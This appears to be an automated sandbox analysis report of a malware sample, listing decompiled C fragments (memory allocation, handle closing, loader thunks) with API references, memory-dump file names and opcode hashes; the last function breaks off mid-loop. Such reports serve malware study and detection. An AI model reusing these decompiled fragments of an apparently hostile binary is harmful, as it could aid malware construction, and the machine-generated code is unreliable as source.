Instruction Fuzzy Hash: F7E0D8726002147BCA10EFD8AC81ED7776CEF85750F014999FA0C6B242C935F61087F4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182DF, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004182DF(void* __edx, intOrPtr _a4, void* _a8) {
				intOrPtr _v117;
				long _t10;
				void* _t13;
				void* _t14;

				_v117 = _v117 - __edx;
				_t7 = _a4;
				_t4 = _t7 + 0x10; // 0x300
				_t5 = _t7 + 0xc50; // 0x409733
				E00418DB0(_t14, _a4, _t5,  *_t4, 0, 0x2c);
				_t13 = _a8;
				_push(es);
				_t10 = NtClose(_t13); // executed
				return _t10;
			}

0x004182df
0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x004182fc
0x00418300
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ed64bf7b98bc48646a5847b8a29f122fc1a1d888325e34f9ecc6b077c1cbf6b2
Instruction ID: 06da6dbf7b8da5fd4e2aabc4c63593857ffff5c866927f966f0e713cbffbf862
Opcode Fuzzy Hash: ed64bf7b98bc48646a5847b8a29f122fc1a1d888325e34f9ecc6b077c1cbf6b2
Instruction Fuzzy Hash: 4FE0C2352002007BDB10DFA5CC85EDB7B68EF44350F14419DFA0D9B242C530E5008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t10;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = _a8;
				_push(es);
				_t8 = NtClose(_t10); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x004182fc
0x00418300
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 00A000C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A000CF

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A00078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A00086

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00A00048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A00053

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00A007AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A007B7

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 009FF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FF9FB

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 009FF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FF90E

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFADB

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFAF3

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 009FFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFBC3

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFB73

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFC9B

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFC6B

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFD9A

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 009FFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFDCB

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009FFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFEAB

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 009FFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFEDB

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFFBF

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088A0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
